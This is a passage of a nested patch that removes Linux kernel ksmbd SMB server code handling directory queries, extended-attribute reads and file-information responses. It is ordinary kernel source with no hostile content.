+-		 * UNIX sid(16) = revision(1) + num_subauth(1) + authority(6) +
+-		 *		  sub_auth(4 * 1(num_subauth)) + RID(4).
+-		 */
+-		id_to_sid(from_kuid_munged(&init_user_ns, ksmbd_kstat->kstat->uid),
+-			  SIDUNIX_USER, (struct smb_sid *)&posix_info->SidBuffer[0]);
+-		id_to_sid(from_kgid_munged(&init_user_ns, ksmbd_kstat->kstat->gid),
+-			  SIDUNIX_GROUP, (struct smb_sid *)&posix_info->SidBuffer[16]);
+-		memcpy(posix_info->name, conv_name, conv_len);
+-		posix_info->name_len = cpu_to_le32(conv_len);
+-		posix_info->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-
+-	} /* switch (info_level) */
+-
+-	d_info->last_entry_offset = d_info->data_count;
+-	d_info->data_count += next_entry_offset;
+-	d_info->out_buf_len -= next_entry_offset;
+-	d_info->wptr += next_entry_offset;
+-
+-	ksmbd_debug(SMB,
+-		    "info_level : %d, buf_len :%d, next_offset : %d, data_count : %d\n",
+-		    info_level, d_info->out_buf_len,
+-		    next_entry_offset, d_info->data_count);
+-
+-free_conv_name:
+-	kfree(conv_name);
+-	return rc;
+-}
+-
+-struct smb2_query_dir_private {
+-	struct ksmbd_work	*work;
+-	char			*search_pattern;
+-	struct ksmbd_file	*dir_fp;
+-
+-	struct ksmbd_dir_info	*d_info;
+-	int			info_level;
+-};
+-
+-static void lock_dir(struct ksmbd_file *dir_fp)
+-{
+-	struct dentry *dir = dir_fp->filp->f_path.dentry;
+-
+-	inode_lock_nested(d_inode(dir), I_MUTEX_PARENT);
+-}
+-
+-static void unlock_dir(struct ksmbd_file *dir_fp)
+-{
+-	struct dentry *dir = dir_fp->filp->f_path.dentry;
+-
+-	inode_unlock(d_inode(dir));
+-}
+-
+-static int process_query_dir_entries(struct smb2_query_dir_private *priv)
+-{
+-	struct user_namespace	*user_ns = file_mnt_user_ns(priv->dir_fp->filp);
+-	struct kstat		kstat;
+-	struct ksmbd_kstat	ksmbd_kstat;
+-	int			rc;
+-	int			i;
+-
+-	for (i = 0; i < priv->d_info->num_entry; i++) {
+-		struct dentry *dent;
+-
+-		if (dentry_name(priv->d_info, priv->info_level))
+-			return -EINVAL;
+-
+-		lock_dir(priv->dir_fp);
+-		dent = lookup_one(user_ns, priv->d_info->name,
+-				  priv->dir_fp->filp->f_path.dentry,
+-				  priv->d_info->name_len);
+-		unlock_dir(priv->dir_fp);
+-
+-		if (IS_ERR(dent)) {
+-			ksmbd_debug(SMB, "Cannot lookup `%s' [%ld]\n",
+-				    priv->d_info->name,
+-				    PTR_ERR(dent));
+-			continue;
+-		}
+-		if (unlikely(d_is_negative(dent))) {
+-			dput(dent);
+-			ksmbd_debug(SMB, "Negative dentry `%s'\n",
+-				    priv->d_info->name);
+-			continue;
+-		}
+-
+-		ksmbd_kstat.kstat = &kstat;
+-		if (priv->info_level != FILE_NAMES_INFORMATION)
+-			ksmbd_vfs_fill_dentry_attrs(priv->work,
+-						    user_ns,
+-						    dent,
+-						    &ksmbd_kstat);
+-
+-		rc = smb2_populate_readdir_entry(priv->work->conn,
+-						 priv->info_level,
+-						 priv->d_info,
+-						 &ksmbd_kstat);
+-		dput(dent);
+-		if (rc)
+-			return rc;
+-	}
+-	return 0;
+-}
+-
+-static int reserve_populate_dentry(struct ksmbd_dir_info *d_info,
+-				   int info_level)
+-{
+-	int struct_sz;
+-	int conv_len;
+-	int next_entry_offset;
+-
+-	struct_sz = readdir_info_level_struct_sz(info_level);
+-	if (struct_sz == -EOPNOTSUPP)
+-		return -EOPNOTSUPP;
+-
+-	conv_len = (d_info->name_len + 1) * 2;
+-	next_entry_offset = ALIGN(struct_sz - 1 + conv_len,
+-				  KSMBD_DIR_INFO_ALIGNMENT);
+-
+-	if (next_entry_offset > d_info->out_buf_len) {
+-		d_info->out_buf_len = 0;
+-		return -ENOSPC;
+-	}
+-
+-	switch (info_level) {
+-	case FILE_FULL_DIRECTORY_INFORMATION:
+-	{
+-		struct file_full_directory_info *ffdinfo;
+-
+-		ffdinfo = (struct file_full_directory_info *)d_info->wptr;
+-		memcpy(ffdinfo->FileName, d_info->name, d_info->name_len);
+-		ffdinfo->FileName[d_info->name_len] = 0x00;
+-		ffdinfo->FileNameLength = cpu_to_le32(d_info->name_len);
+-		ffdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILE_BOTH_DIRECTORY_INFORMATION:
+-	{
+-		struct file_both_directory_info *fbdinfo;
+-
+-		fbdinfo = (struct file_both_directory_info *)d_info->wptr;
+-		memcpy(fbdinfo->FileName, d_info->name, d_info->name_len);
+-		fbdinfo->FileName[d_info->name_len] = 0x00;
+-		fbdinfo->FileNameLength = cpu_to_le32(d_info->name_len);
+-		fbdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILE_DIRECTORY_INFORMATION:
+-	{
+-		struct file_directory_info *fdinfo;
+-
+-		fdinfo = (struct file_directory_info *)d_info->wptr;
+-		memcpy(fdinfo->FileName, d_info->name, d_info->name_len);
+-		fdinfo->FileName[d_info->name_len] = 0x00;
+-		fdinfo->FileNameLength = cpu_to_le32(d_info->name_len);
+-		fdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILE_NAMES_INFORMATION:
+-	{
+-		struct file_names_info *fninfo;
+-
+-		fninfo = (struct file_names_info *)d_info->wptr;
+-		memcpy(fninfo->FileName, d_info->name, d_info->name_len);
+-		fninfo->FileName[d_info->name_len] = 0x00;
+-		fninfo->FileNameLength = cpu_to_le32(d_info->name_len);
+-		fninfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILEID_FULL_DIRECTORY_INFORMATION:
+-	{
+-		struct file_id_full_dir_info *dinfo;
+-
+-		dinfo = (struct file_id_full_dir_info *)d_info->wptr;
+-		memcpy(dinfo->FileName, d_info->name, d_info->name_len);
+-		dinfo->FileName[d_info->name_len] = 0x00;
+-		dinfo->FileNameLength = cpu_to_le32(d_info->name_len);
+-		dinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILEID_BOTH_DIRECTORY_INFORMATION:
+-	{
+-		struct file_id_both_directory_info *fibdinfo;
+-
+-		fibdinfo = (struct file_id_both_directory_info *)d_info->wptr;
+-		memcpy(fibdinfo->FileName, d_info->name, d_info->name_len);
+-		fibdinfo->FileName[d_info->name_len] = 0x00;
+-		fibdinfo->FileNameLength = cpu_to_le32(d_info->name_len);
+-		fibdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case SMB_FIND_FILE_POSIX_INFO:
+-	{
+-		struct smb2_posix_info *posix_info;
+-
+-		posix_info = (struct smb2_posix_info *)d_info->wptr;
+-		memcpy(posix_info->name, d_info->name, d_info->name_len);
+-		posix_info->name[d_info->name_len] = 0x00;
+-		posix_info->name_len = cpu_to_le32(d_info->name_len);
+-		posix_info->NextEntryOffset =
+-			cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	} /* switch (info_level) */
+-
+-	d_info->num_entry++;
+-	d_info->out_buf_len -= next_entry_offset;
+-	d_info->wptr += next_entry_offset;
+-	return 0;
+-}
+-
+-static bool __query_dir(struct dir_context *ctx, const char *name, int namlen,
+-		       loff_t offset, u64 ino, unsigned int d_type)
+-{
+-	struct ksmbd_readdir_data	*buf;
+-	struct smb2_query_dir_private	*priv;
+-	struct ksmbd_dir_info		*d_info;
+-	int				rc;
+-
+-	buf	= container_of(ctx, struct ksmbd_readdir_data, ctx);
+-	priv	= buf->private;
+-	d_info	= priv->d_info;
+-
+-	/* dot and dotdot entries are already reserved */
+-	if (!strcmp(".", name) || !strcmp("..", name))
+-		return true;
+-	if (ksmbd_share_veto_filename(priv->work->tcon->share_conf, name))
+-		return true;
+-	if (!match_pattern(name, namlen, priv->search_pattern))
+-		return true;
+-
+-	d_info->name		= name;
+-	d_info->name_len	= namlen;
+-	rc = reserve_populate_dentry(d_info, priv->info_level);
+-	if (rc)
+-		return false;
+-	if (d_info->flags & SMB2_RETURN_SINGLE_ENTRY)
+-		d_info->out_buf_len = 0;
+-	return true;
+-}
+-
+-static int verify_info_level(int info_level)
+-{
+-	switch (info_level) {
+-	case FILE_FULL_DIRECTORY_INFORMATION:
+-	case FILE_BOTH_DIRECTORY_INFORMATION:
+-	case FILE_DIRECTORY_INFORMATION:
+-	case FILE_NAMES_INFORMATION:
+-	case FILEID_FULL_DIRECTORY_INFORMATION:
+-	case FILEID_BOTH_DIRECTORY_INFORMATION:
+-	case SMB_FIND_FILE_POSIX_INFO:
+-		break;
+-	default:
+-		return -EOPNOTSUPP;
+-	}
+-
+-	return 0;
+-}
+-
+-static int smb2_resp_buf_len(struct ksmbd_work *work, unsigned short hdr2_len)
+-{
+-	int free_len;
+-
+-	free_len = (int)(work->response_sz -
+-		(get_rfc1002_len(work->response_buf) + 4)) - hdr2_len;
+-	return free_len;
+-}
+-
+-static int smb2_calc_max_out_buf_len(struct ksmbd_work *work,
+-				     unsigned short hdr2_len,
+-				     unsigned int out_buf_len)
+-{
+-	int free_len;
+-
+-	if (out_buf_len > work->conn->vals->max_trans_size)
+-		return -EINVAL;
+-
+-	free_len = smb2_resp_buf_len(work, hdr2_len);
+-	if (free_len < 0)
+-		return -EINVAL;
+-
+-	return min_t(int, out_buf_len, free_len);
+-}
+-
+-int smb2_query_dir(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_query_directory_req *req;
+-	struct smb2_query_directory_rsp *rsp;
+-	struct ksmbd_share_config *share = work->tcon->share_conf;
+-	struct ksmbd_file *dir_fp = NULL;
+-	struct ksmbd_dir_info d_info;
+-	int rc = 0;
+-	char *srch_ptr = NULL;
+-	unsigned char srch_flag;
+-	int buffer_sz;
+-	struct smb2_query_dir_private query_dir_private = {NULL, };
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	if (ksmbd_override_fsids(work)) {
+-		rsp->hdr.Status = STATUS_NO_MEMORY;
+-		smb2_set_err_rsp(work);
+-		return -ENOMEM;
+-	}
+-
+-	rc = verify_info_level(req->FileInformationClass);
+-	if (rc) {
+-		rc = -EFAULT;
+-		goto err_out2;
+-	}
+-
+-	dir_fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
+-	if (!dir_fp) {
+-		rc = -EBADF;
+-		goto err_out2;
+-	}
+-
+-	if (!(dir_fp->daccess & FILE_LIST_DIRECTORY_LE) ||
+-	    inode_permission(file_mnt_user_ns(dir_fp->filp),
+-			     file_inode(dir_fp->filp),
+-			     MAY_READ | MAY_EXEC)) {
+-		pr_err("no right to enumerate directory (%pD)\n", dir_fp->filp);
+-		rc = -EACCES;
+-		goto err_out2;
+-	}
+-
+-	if (!S_ISDIR(file_inode(dir_fp->filp)->i_mode)) {
+-		pr_err("can't do query dir for a file\n");
+-		rc = -EINVAL;
+-		goto err_out2;
+-	}
+-
+-	srch_flag = req->Flags;
+-	srch_ptr = smb_strndup_from_utf16(req->Buffer,
+-					  le16_to_cpu(req->FileNameLength), 1,
+-					  conn->local_nls);
+-	if (IS_ERR(srch_ptr)) {
+-		ksmbd_debug(SMB, "Search Pattern not found\n");
+-		rc = -EINVAL;
+-		goto err_out2;
+-	} else {
+-		ksmbd_debug(SMB, "Search pattern is %s\n", srch_ptr);
+-	}
+-
+-	if (srch_flag & SMB2_REOPEN || srch_flag & SMB2_RESTART_SCANS) {
+-		ksmbd_debug(SMB, "Restart directory scan\n");
+-		generic_file_llseek(dir_fp->filp, 0, SEEK_SET);
+-	}
+-
+-	memset(&d_info, 0, sizeof(struct ksmbd_dir_info));
+-	d_info.wptr = (char *)rsp->Buffer;
+-	d_info.rptr = (char *)rsp->Buffer;
+-	d_info.out_buf_len =
+-		smb2_calc_max_out_buf_len(work, 8,
+-					  le32_to_cpu(req->OutputBufferLength));
+-	if (d_info.out_buf_len < 0) {
+-		rc = -EINVAL;
+-		goto err_out;
+-	}
+-	d_info.flags = srch_flag;
+-
+-	/*
+-	 * reserve dot and dotdot entries in head of buffer
+-	 * in first response
+-	 */
+-	rc = ksmbd_populate_dot_dotdot_entries(work, req->FileInformationClass,
+-					       dir_fp, &d_info, srch_ptr,
+-					       smb2_populate_readdir_entry);
+-	if (rc == -ENOSPC)
+-		rc = 0;
+-	else if (rc)
+-		goto err_out;
+-
+-	if (test_share_config_flag(share, KSMBD_SHARE_FLAG_HIDE_DOT_FILES))
+-		d_info.hide_dot_file = true;
+-
+-	buffer_sz				= d_info.out_buf_len;
+-	d_info.rptr				= d_info.wptr;
+-	query_dir_private.work			= work;
+-	query_dir_private.search_pattern	= srch_ptr;
+-	query_dir_private.dir_fp		= dir_fp;
+-	query_dir_private.d_info		= &d_info;
+-	query_dir_private.info_level		= req->FileInformationClass;
+-	dir_fp->readdir_data.private		= &query_dir_private;
+-	set_ctx_actor(&dir_fp->readdir_data.ctx, __query_dir);
+-
+-	rc = iterate_dir(dir_fp->filp, &dir_fp->readdir_data.ctx);
+-	/*
+-	 * req->OutputBufferLength is too small to contain even one entry.
+-	 * In this case, it immediately returns OutputBufferLength 0 to client.
+-	 */
+-	if (!d_info.out_buf_len && !d_info.num_entry)
+-		goto no_buf_len;
+-	if (rc > 0 || rc == -ENOSPC)
+-		rc = 0;
+-	else if (rc)
+-		goto err_out;
+-
+-	d_info.wptr = d_info.rptr;
+-	d_info.out_buf_len = buffer_sz;
+-	rc = process_query_dir_entries(&query_dir_private);
+-	if (rc)
+-		goto err_out;
+-
+-	if (!d_info.data_count && d_info.out_buf_len >= 0) {
+-		if (srch_flag & SMB2_RETURN_SINGLE_ENTRY && !is_asterisk(srch_ptr)) {
+-			rsp->hdr.Status = STATUS_NO_SUCH_FILE;
+-		} else {
+-			dir_fp->dot_dotdot[0] = dir_fp->dot_dotdot[1] = 0;
+-			rsp->hdr.Status = STATUS_NO_MORE_FILES;
+-		}
+-		rsp->StructureSize = cpu_to_le16(9);
+-		rsp->OutputBufferOffset = cpu_to_le16(0);
+-		rsp->OutputBufferLength = cpu_to_le32(0);
+-		rsp->Buffer[0] = 0;
+-		inc_rfc1001_len(work->response_buf, 9);
+-	} else {
+-no_buf_len:
+-		((struct file_directory_info *)
+-		((char *)rsp->Buffer + d_info.last_entry_offset))
+-		->NextEntryOffset = 0;
+-		if (d_info.data_count >= d_info.last_entry_off_align)
+-			d_info.data_count -= d_info.last_entry_off_align;
+-
+-		rsp->StructureSize = cpu_to_le16(9);
+-		rsp->OutputBufferOffset = cpu_to_le16(72);
+-		rsp->OutputBufferLength = cpu_to_le32(d_info.data_count);
+-		inc_rfc1001_len(work->response_buf, 8 + d_info.data_count);
+-	}
+-
+-	kfree(srch_ptr);
+-	ksmbd_fd_put(work, dir_fp);
+-	ksmbd_revert_fsids(work);
+-	return 0;
+-
+-err_out:
+-	pr_err("error while processing smb2 query dir rc = %d\n", rc);
+-	kfree(srch_ptr);
+-
+-err_out2:
+-	if (rc == -EINVAL)
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-	else if (rc == -EACCES)
+-		rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-	else if (rc == -ENOENT)
+-		rsp->hdr.Status = STATUS_NO_SUCH_FILE;
+-	else if (rc == -EBADF)
+-		rsp->hdr.Status = STATUS_FILE_CLOSED;
+-	else if (rc == -ENOMEM)
+-		rsp->hdr.Status = STATUS_NO_MEMORY;
+-	else if (rc == -EFAULT)
+-		rsp->hdr.Status = STATUS_INVALID_INFO_CLASS;
+-	else if (rc == -EIO)
+-		rsp->hdr.Status = STATUS_FILE_CORRUPT_ERROR;
+-	if (!rsp->hdr.Status)
+-		rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
+-
+-	smb2_set_err_rsp(work);
+-	ksmbd_fd_put(work, dir_fp);
+-	ksmbd_revert_fsids(work);
+-	return 0;
+-}
+-
+-/**
+- * buffer_check_err() - helper function to check buffer errors
+- * @reqOutputBufferLength:	max buffer length expected in command response
+- * @rsp:		query info response buffer contains output buffer length
+- * @rsp_org:		base response buffer pointer in case of chained response
+- * @infoclass_size:	query info class response buffer size
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static int buffer_check_err(int reqOutputBufferLength,
+-			    struct smb2_query_info_rsp *rsp,
+-			    void *rsp_org, int infoclass_size)
+-{
+-	if (reqOutputBufferLength < le32_to_cpu(rsp->OutputBufferLength)) {
+-		if (reqOutputBufferLength < infoclass_size) {
+-			pr_err("Invalid Buffer Size Requested\n");
+-			rsp->hdr.Status = STATUS_INFO_LENGTH_MISMATCH;
+-			*(__be32 *)rsp_org = cpu_to_be32(sizeof(struct smb2_hdr));
+-			return -EINVAL;
+-		}
+-
+-		ksmbd_debug(SMB, "Buffer Overflow\n");
+-		rsp->hdr.Status = STATUS_BUFFER_OVERFLOW;
+-		*(__be32 *)rsp_org = cpu_to_be32(sizeof(struct smb2_hdr) +
+-				reqOutputBufferLength);
+-		rsp->OutputBufferLength = cpu_to_le32(reqOutputBufferLength);
+-	}
+-	return 0;
+-}
+-
+-static void get_standard_info_pipe(struct smb2_query_info_rsp *rsp,
+-				   void *rsp_org)
+-{
+-	struct smb2_file_standard_info *sinfo;
+-
+-	sinfo = (struct smb2_file_standard_info *)rsp->Buffer;
+-
+-	sinfo->AllocationSize = cpu_to_le64(4096);
+-	sinfo->EndOfFile = cpu_to_le64(0);
+-	sinfo->NumberOfLinks = cpu_to_le32(1);
+-	sinfo->DeletePending = 1;
+-	sinfo->Directory = 0;
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_standard_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_standard_info));
+-}
+-
+-static void get_internal_info_pipe(struct smb2_query_info_rsp *rsp, u64 num,
+-				   void *rsp_org)
+-{
+-	struct smb2_file_internal_info *file_info;
+-
+-	file_info = (struct smb2_file_internal_info *)rsp->Buffer;
+-
+-	/* any unique number */
+-	file_info->IndexNumber = cpu_to_le64(num | (1ULL << 63));
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_internal_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_internal_info));
+-}
+-
+-static int smb2_get_info_file_pipe(struct ksmbd_session *sess,
+-				   struct smb2_query_info_req *req,
+-				   struct smb2_query_info_rsp *rsp,
+-				   void *rsp_org)
+-{
+-	u64 id;
+-	int rc;
+-
+-	/*
+-	 * Windows can sometime send query file info request on
+-	 * pipe without opening it, checking error condition here
+-	 */
+-	id = req->VolatileFileId;
+-	if (!ksmbd_session_rpc_method(sess, id))
+-		return -ENOENT;
+-
+-	ksmbd_debug(SMB, "FileInfoClass %u, FileId 0x%llx\n",
+-		    req->FileInfoClass, req->VolatileFileId);
+-
+-	switch (req->FileInfoClass) {
+-	case FILE_STANDARD_INFORMATION:
+-		get_standard_info_pipe(rsp, rsp_org);
+-		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
+-				      rsp, rsp_org,
+-				      FILE_STANDARD_INFORMATION_SIZE);
+-		break;
+-	case FILE_INTERNAL_INFORMATION:
+-		get_internal_info_pipe(rsp, id, rsp_org);
+-		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
+-				      rsp, rsp_org,
+-				      FILE_INTERNAL_INFORMATION_SIZE);
+-		break;
+-	default:
+-		ksmbd_debug(SMB, "smb2_info_file_pipe for %u not supported\n",
+-			    req->FileInfoClass);
+-		rc = -EOPNOTSUPP;
+-	}
+-	return rc;
+-}
+-
+-/**
+- * smb2_get_ea() - handler for smb2 get extended attribute command
+- * @work:	smb work containing query info command buffer
+- * @fp:		ksmbd_file pointer
+- * @req:	get extended attribute request
+- * @rsp:	response buffer pointer
+- * @rsp_org:	base response buffer pointer in case of chained response
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static int smb2_get_ea(struct ksmbd_work *work, struct ksmbd_file *fp,
+-		       struct smb2_query_info_req *req,
+-		       struct smb2_query_info_rsp *rsp, void *rsp_org)
+-{
+-	struct smb2_ea_info *eainfo, *prev_eainfo;
+-	char *name, *ptr, *xattr_list = NULL, *buf;
+-	int rc, name_len, value_len, xattr_list_len, idx;
+-	ssize_t buf_free_len, alignment_bytes, next_offset, rsp_data_cnt = 0;
+-	struct smb2_ea_info_req *ea_req = NULL;
+-	const struct path *path;
+-	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
+-
+-	if (!(fp->daccess & FILE_READ_EA_LE)) {
+-		pr_err("Not permitted to read ext attr : 0x%x\n",
+-		       fp->daccess);
+-		return -EACCES;
+-	}
+-
+-	path = &fp->filp->f_path;
+-	/* single EA entry is requested with given user.* name */
+-	if (req->InputBufferLength) {
+-		if (le32_to_cpu(req->InputBufferLength) <
+-		    sizeof(struct smb2_ea_info_req))
+-			return -EINVAL;
+-
+-		ea_req = (struct smb2_ea_info_req *)req->Buffer;
+-	} else {
+-		/* need to send all EAs, if no specific EA is requested*/
+-		if (le32_to_cpu(req->Flags) & SL_RETURN_SINGLE_ENTRY)
+-			ksmbd_debug(SMB,
+-				    "All EAs are requested but need to send single EA entry in rsp flags 0x%x\n",
+-				    le32_to_cpu(req->Flags));
+-	}
+-
+-	buf_free_len =
+-		smb2_calc_max_out_buf_len(work, 8,
+-					  le32_to_cpu(req->OutputBufferLength));
+-	if (buf_free_len < 0)
+-		return -EINVAL;
+-
+-	rc = ksmbd_vfs_listxattr(path->dentry, &xattr_list);
+-	if (rc < 0) {
+-		rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-		goto out;
+-	} else if (!rc) { /* there is no EA in the file */
+-		ksmbd_debug(SMB, "no ea data in the file\n");
+-		goto done;
+-	}
+-	xattr_list_len = rc;
+-
+-	ptr = (char *)rsp->Buffer;
+-	eainfo = (struct smb2_ea_info *)ptr;
+-	prev_eainfo = eainfo;
+-	idx = 0;
+-
+-	while (idx < xattr_list_len) {
+-		name = xattr_list + idx;
+-		name_len = strlen(name);
+-
+-		ksmbd_debug(SMB, "%s, len %d\n", name, name_len);
+-		idx += name_len + 1;
+-
+-		/*
+-		 * CIFS does not support EA other than user.* namespace,
+-		 * still keep the framework generic, to list other attrs
+-		 * in future.
+-		 */
+-		if (strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN))
+-			continue;
+-
+-		if (!strncmp(&name[XATTR_USER_PREFIX_LEN], STREAM_PREFIX,
+-			     STREAM_PREFIX_LEN))
+-			continue;
+-
+-		if (req->InputBufferLength &&
+-		    strncmp(&name[XATTR_USER_PREFIX_LEN], ea_req->name,
+-			    ea_req->EaNameLength))
+-			continue;
+-
+-		if (!strncmp(&name[XATTR_USER_PREFIX_LEN],
+-			     DOS_ATTRIBUTE_PREFIX, DOS_ATTRIBUTE_PREFIX_LEN))
+-			continue;
+-
+-		if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN))
+-			name_len -= XATTR_USER_PREFIX_LEN;
+-
+-		ptr = (char *)(&eainfo->name + name_len + 1);
+-		buf_free_len -= (offsetof(struct smb2_ea_info, name) +
+-				name_len + 1);
+-		/* bailout if xattr can't fit in buf_free_len */
+-		value_len = ksmbd_vfs_getxattr(user_ns, path->dentry,
+-					       name, &buf);
+-		if (value_len <= 0) {
+-			rc = -ENOENT;
+-			rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-			goto out;
+-		}
+-
+-		buf_free_len -= value_len;
+-		if (buf_free_len < 0) {
+-			kfree(buf);
+-			break;
+-		}
+-
+-		memcpy(ptr, buf, value_len);
+-		kfree(buf);
+-
+-		ptr += value_len;
+-		eainfo->Flags = 0;
+-		eainfo->EaNameLength = name_len;
+-
+-		if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN))
+-			memcpy(eainfo->name, &name[XATTR_USER_PREFIX_LEN],
+-			       name_len);
+-		else
+-			memcpy(eainfo->name, name, name_len);
+-
+-		eainfo->name[name_len] = '\0';
+-		eainfo->EaValueLength = cpu_to_le16(value_len);
+-		next_offset = offsetof(struct smb2_ea_info, name) +
+-			name_len + 1 + value_len;
+-
+-		/* align next xattr entry at 4 byte bundary */
+-		alignment_bytes = ((next_offset + 3) & ~3) - next_offset;
+-		if (alignment_bytes) {
+-			memset(ptr, '\0', alignment_bytes);
+-			ptr += alignment_bytes;
+-			next_offset += alignment_bytes;
+-			buf_free_len -= alignment_bytes;
+-		}
+-		eainfo->NextEntryOffset = cpu_to_le32(next_offset);
+-		prev_eainfo = eainfo;
+-		eainfo = (struct smb2_ea_info *)ptr;
+-		rsp_data_cnt += next_offset;
+-
+-		if (req->InputBufferLength) {
+-			ksmbd_debug(SMB, "single entry requested\n");
+-			break;
+-		}
+-	}
+-
+-	/* no more ea entries */
+-	prev_eainfo->NextEntryOffset = 0;
+-done:
+-	rc = 0;
+-	if (rsp_data_cnt == 0)
+-		rsp->hdr.Status = STATUS_NO_EAS_ON_FILE;
+-	rsp->OutputBufferLength = cpu_to_le32(rsp_data_cnt);
+-	inc_rfc1001_len(rsp_org, rsp_data_cnt);
+-out:
+-	kvfree(xattr_list);
+-	return rc;
+-}
+-
+-static void get_file_access_info(struct smb2_query_info_rsp *rsp,
+-				 struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_access_info *file_info;
+-
+-	file_info = (struct smb2_file_access_info *)rsp->Buffer;
+-	file_info->AccessFlags = fp->daccess;
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_access_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_access_info));
+-}
+-
+-static int get_file_basic_info(struct smb2_query_info_rsp *rsp,
+-			       struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_basic_info *basic_info;
+-	struct kstat stat;
+-	u64 time;
+-
+-	if (!(fp->daccess & FILE_READ_ATTRIBUTES_LE)) {
+-		pr_err("no right to read the attributes : 0x%x\n",
+-		       fp->daccess);
+-		return -EACCES;
+-	}
+-
+-	basic_info = (struct smb2_file_basic_info *)rsp->Buffer;
+-	generic_fillattr(file_mnt_user_ns(fp->filp), file_inode(fp->filp),
+-			 &stat);
+-	basic_info->CreationTime = cpu_to_le64(fp->create_time);
+-	time = ksmbd_UnixTimeToNT(stat.atime);
+-	basic_info->LastAccessTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(stat.mtime);
+-	basic_info->LastWriteTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(stat.ctime);
+-	basic_info->ChangeTime = cpu_to_le64(time);
+-	basic_info->Attributes = fp->f_ci->m_fattr;
+-	basic_info->Pad1 = 0;
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_basic_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_basic_info));
+-	return 0;
+-}
+-
+-static void get_file_standard_info(struct smb2_query_info_rsp *rsp,
+-				   struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_standard_info *sinfo;
+-	unsigned int delete_pending;
+-	struct inode *inode;
+-	struct kstat stat;
+-
+-	inode = file_inode(fp->filp);
+-	generic_fillattr(file_mnt_user_ns(fp->filp), inode, &stat);
+-
+-	sinfo = (struct smb2_file_standard_info *)rsp->Buffer;
+-	delete_pending = ksmbd_inode_pending_delete(fp);
+-
+-	sinfo->AllocationSize = cpu_to_le64(inode->i_blocks << 9);
+-	sinfo->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
+-	sinfo->NumberOfLinks = cpu_to_le32(get_nlink(&stat) - delete_pending);
+-	sinfo->DeletePending = delete_pending;
+-	sinfo->Directory = S_ISDIR(stat.mode) ? 1 : 0;
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_standard_info));
+-	inc_rfc1001_len(rsp_org,
+-			sizeof(struct smb2_file_standard_info));
+-}
+-
+-static void get_file_alignment_info(struct smb2_query_info_rsp *rsp,
+-				    void *rsp_org)
+-{
+-	struct smb2_file_alignment_info *file_info;
+-
+-	file_info = (struct smb2_file_alignment_info *)rsp->Buffer;
+-	file_info->AlignmentRequirement = 0;
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_alignment_info));
+-	inc_rfc1001_len(rsp_org,
+-			sizeof(struct smb2_file_alignment_info));
+-}
+-
+-static int get_file_all_info(struct ksmbd_work *work,
+-			     struct smb2_query_info_rsp *rsp,
+-			     struct ksmbd_file *fp,
+-			     void *rsp_org)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_file_all_info *file_info;
+-	unsigned int delete_pending;
+-	struct inode *inode;
+-	struct kstat stat;
+-	int conv_len;
+-	char *filename;
+-	u64 time;
+-
+-	if (!(fp->daccess & FILE_READ_ATTRIBUTES_LE)) {
+-		ksmbd_debug(SMB, "no right to read the attributes : 0x%x\n",
+-			    fp->daccess);
+-		return -EACCES;
+-	}
+-
+-	filename = convert_to_nt_pathname(work->tcon->share_conf, &fp->filp->f_path);
+-	if (IS_ERR(filename))
+-		return PTR_ERR(filename);
+-
+-	inode = file_inode(fp->filp);
+-	generic_fillattr(file_mnt_user_ns(fp->filp), inode, &stat);
+-
+-	ksmbd_debug(SMB, "filename = %s\n", filename);
+-	delete_pending = ksmbd_inode_pending_delete(fp);
+-	file_info = (struct smb2_file_all_info *)rsp->Buffer;
+-
+-	file_info->CreationTime = cpu_to_le64(fp->create_time);
+-	time = ksmbd_UnixTimeToNT(stat.atime);
+-	file_info->LastAccessTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(stat.mtime);
